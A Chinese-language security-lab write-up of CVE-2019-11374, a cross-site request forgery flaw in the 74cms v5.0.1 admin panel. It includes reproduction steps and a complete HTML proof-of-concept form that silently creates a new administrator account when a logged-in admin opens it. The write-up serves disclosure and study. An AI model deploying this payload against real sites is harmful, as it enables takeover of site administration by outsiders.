CVE-2019-11374 74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞-漏洞文库小世界-安全文库-NGC660 安全实验室

CVE-2019-11374 74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞

CVE-2019-11374 74cms v5.0.1 后台跨站请求伪造(CSRF)漏洞

一、漏洞简介

在74CMS v5.0.1后台存在一个跨站请求伪造(CSRF)漏洞,该漏洞url:/index.php?m=admin&c=admin&a=add 攻击者可以利用该漏洞诱骗管理员点击恶意页面,从而任意添加一个后台管理员账户,达到进入后台,获得一个后台管理员角色的控制权。

二、漏洞影响

74CMS v5.0.1

三、复现过程

首先是骑士cms的安装,设置管理员账户名为admin777,密码也是admin777

54ddb3f2613cf5d21137e4c82b033593

安装完成后如下url进入后台

http://url/74cms/index.php?m=admin&c=index&a=login

输入管理员账号密码同为admin777进入后台

点击系统一栏,进入到【系统】->【网络管理员】->【添加管理员】中,进行添加管理员

7ae17c946e86e1b4f2cb5d06a30813df

398206a0d080f28c994a8c7f006c5a8f

deb5036d9053db125f5df5e2a18ca90e

填入自定义的用户名密码邮箱,选择好所属角色,点击添加后抓包

6d171dc83b1c66c4127d4ae498d88142

使用burp生成csrf POC

e6c3a59852eabf84441bf339e9c3fd69

POC代码:

<html>
  
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://url/74cms/index.php?m=admin&c=admin&a=add" method="POST">
      <input type="hidden" name="username" value="test007" />
      <input type="hidden" name="email" value="test&#64;qq&#46;com" />
      <input type="hidden" name="password" value="test007" />
      <input type="hidden" name="repassword" value="test007" />
      <input type="hidden" name="role&#95;id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

测试Poc前记得先在管理页面删除test007用户,以免无法确定Poc可用性

306b5e234220a62ebae5caa418904a70

赋值html内容到本地的Poc.html文件中测试Poc

原管理员列表:

3c8f92b1c4960fa5804de5a8358f6edd

点击Poc.html中的Submit Request按钮

db8fc4b03857f2103a772f606bd21396

点击后显示操作成功

ff4aea4304be7cf464f4dc441a7604f4

回来管理员列表刷新页面查看管理员是否成功添加:

361a2733459e9e3986ad8f1db462cd3d

请登录后发表评论

    请登录后查看回复内容